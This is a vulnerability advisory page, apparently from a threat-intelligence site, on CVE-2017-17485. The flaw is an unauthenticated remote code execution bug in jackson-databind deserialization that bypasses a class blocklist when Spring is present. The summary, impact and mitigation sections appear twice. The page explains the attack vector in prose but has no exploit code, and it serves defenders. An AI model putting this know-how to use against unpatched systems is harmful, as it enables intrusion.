CVE-2017-17485: n/a in n/a
FasterXML jackson-databind through 2.8.10 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.
AI Analysis
Technical Summary
CVE-2017-17485 is a critical deserialization vulnerability affecting the FasterXML jackson-databind library versions up to 2.8.10 and 2.9.x through 2.9.3. Jackson-databind is a widely used Java library for processing JSON data, specifically for converting JSON into Java objects via the ObjectMapper's readValue method. This vulnerability arises from an incomplete fix for a previous deserialization flaw (CVE-2017-7525). The core issue is that the blacklist intended to block dangerous classes during deserialization can be bypassed if Spring framework libraries are present in the application's classpath. This bypass enables an attacker to send specially crafted JSON input that triggers remote code execution (RCE) without requiring authentication or user interaction. The vulnerability exploits the unsafe deserialization of untrusted data, allowing attackers to instantiate arbitrary classes and execute malicious code on the target system. Since jackson-databind is embedded in numerous Java applications and frameworks, this flaw potentially affects a broad range of software products that rely on it for JSON processing. The lack of a CVSS score and absence of known exploits in the wild do not diminish the severity, as the vulnerability enables unauthenticated RCE, which is among the most critical security issues. The vulnerability was published in January 2018, and although patches exist in later versions, many legacy systems may remain vulnerable due to slow update cycles or embedded dependencies.
Potential Impact
For European organizations, the impact of CVE-2017-17485 can be severe. Since jackson-databind is widely used in enterprise Java applications, including web services, APIs, and microservices, exploitation could lead to full system compromise. Attackers could execute arbitrary code remotely, leading to data breaches, service disruption, lateral movement within networks, and potential deployment of ransomware or other malware. Critical sectors such as finance, healthcare, government, and telecommunications, which often rely on Java-based backend systems, are at heightened risk. The vulnerability's ability to bypass authentication means attackers can exploit exposed endpoints without credentials, increasing the attack surface. Additionally, the presence of Spring libraries, common in many European-developed applications, exacerbates the risk by enabling the blacklist bypass. The potential for widespread impact is amplified by the integration of jackson-databind in numerous third-party products and custom applications across Europe. Organizations failing to patch or mitigate this vulnerability could face regulatory penalties under GDPR if personal data is compromised, alongside reputational damage and operational downtime.
Mitigation Recommendations
1. Immediate upgrade of jackson-databind to versions beyond 2.9.3 where this vulnerability is fixed is the most effective mitigation. 2. Conduct a comprehensive inventory of all applications and services using jackson-databind, including transitive dependencies, to identify vulnerable instances. 3. If immediate upgrading is not feasible, implement strict input validation and filtering on JSON inputs to block suspicious payloads, especially those containing polymorphic type information. 4. Disable default typing or polymorphic deserialization features in jackson-databind where possible, as these are commonly exploited vectors. 5. Employ runtime application self-protection (RASP) or web application firewalls (WAF) with custom rules to detect and block exploitation attempts targeting deserialization endpoints. 6. Monitor logs for unusual deserialization activity or errors indicative of exploitation attempts. 7. Isolate and segment critical systems to limit lateral movement if compromise occurs. 8. Engage in secure software development lifecycle practices to avoid unsafe deserialization patterns in future code. 9. Collaborate with software vendors to ensure patched versions are deployed promptly. 10. For Spring-based applications, review classpath dependencies and remove unnecessary libraries that could facilitate blacklist bypass.
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Sweden, Belgium, Austria
CVE-2017-17485: n/a in n/a
Description
FasterXML jackson-databind through 2.8.10 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.
AI-Powered Analysis
Technical Analysis
CVE-2017-17485 is a critical deserialization vulnerability affecting the FasterXML jackson-databind library versions up to 2.8.10 and 2.9.x through 2.9.3. Jackson-databind is a widely used Java library for processing JSON data, specifically for converting JSON into Java objects via the ObjectMapper's readValue method. This vulnerability arises from an incomplete fix for a previous deserialization flaw (CVE-2017-7525). The core issue is that the blacklist intended to block dangerous classes during deserialization can be bypassed if Spring framework libraries are present in the application's classpath. This bypass enables an attacker to send specially crafted JSON input that triggers remote code execution (RCE) without requiring authentication or user interaction. The vulnerability exploits the unsafe deserialization of untrusted data, allowing attackers to instantiate arbitrary classes and execute malicious code on the target system. Since jackson-databind is embedded in numerous Java applications and frameworks, this flaw potentially affects a broad range of software products that rely on it for JSON processing. The lack of a CVSS score and absence of known exploits in the wild do not diminish the severity, as the vulnerability enables unauthenticated RCE, which is among the most critical security issues. The vulnerability was published in January 2018, and although patches exist in later versions, many legacy systems may remain vulnerable due to slow update cycles or embedded dependencies.
Potential Impact
For European organizations, the impact of CVE-2017-17485 can be severe. Since jackson-databind is widely used in enterprise Java applications, including web services, APIs, and microservices, exploitation could lead to full system compromise. Attackers could execute arbitrary code remotely, leading to data breaches, service disruption, lateral movement within networks, and potential deployment of ransomware or other malware. Critical sectors such as finance, healthcare, government, and telecommunications, which often rely on Java-based backend systems, are at heightened risk. The vulnerability's ability to bypass authentication means attackers can exploit exposed endpoints without credentials, increasing the attack surface. Additionally, the presence of Spring libraries, common in many European-developed applications, exacerbates the risk by enabling the blacklist bypass. The potential for widespread impact is amplified by the integration of jackson-databind in numerous third-party products and custom applications across Europe. Organizations failing to patch or mitigate this vulnerability could face regulatory penalties under GDPR if personal data is compromised, alongside reputational damage and operational downtime.
Mitigation Recommendations
1. Immediate upgrade of jackson-databind to versions beyond 2.9.3 where this vulnerability is fixed is the most effective mitigation. 2. Conduct a comprehensive inventory of all applications and services using jackson-databind, including transitive dependencies, to identify vulnerable instances. 3. If immediate upgrading is not feasible, implement strict input validation and filtering on JSON inputs to block suspicious payloads, especially those containing polymorphic type information. 4. Disable default typing or polymorphic deserialization features in jackson-databind where possible, as these are commonly exploited vectors. 5. Employ runtime application self-protection (RASP) or web application firewalls (WAF) with custom rules to detect and block exploitation attempts targeting deserialization endpoints. 6. Monitor logs for unusual deserialization activity or errors indicative of exploitation attempts. 7. Isolate and segment critical systems to limit lateral movement if compromise occurs. 8. Engage in secure software development lifecycle practices to avoid unsafe deserialization patterns in future code. 9. Collaborate with software vendors to ensure patched versions are deployed promptly. 10. For Spring-based applications, review classpath dependencies and remove unnecessary libraries that could facilitate blacklist bypass.
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Data Version
- 5.1
- Assigner Short Name
- mitre
- Date Reserved
- 2017-12-10T00:00:00.000Z
- Cisa Enriched
- true
- Cvss Version
- null
- State
- PUBLISHED
Threat ID: 682d983ac4522896dcbed03c
Added to database: 5/21/2025, 9:09:14 AM
Last enriched: 6/25/2025, 5:22:56 PM
Last updated: 8/11/2025, 7:30:55 AM
Views: 13
Related Threats
CVE-2025-7973: CWE-268: Privilege Chaining in Rockwell Automation FactoryTalk® ViewPoint
HighCVE-2025-7773: CWE-863: Incorrect Authorization in Rockwell Automation 5032-CFGB16M12P5DR
HighCVE-2025-43984: n/a
UnknownCVE-2025-36581: CWE-788: Access of Memory Location After End of Buffer in Dell PowerEdge
LowCVE-2025-9036: CWE-200 Exposure of Sensitive Information to an Unauthorized Actor in Rockwell Automation FactoryTalk® Action Manager
HighActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.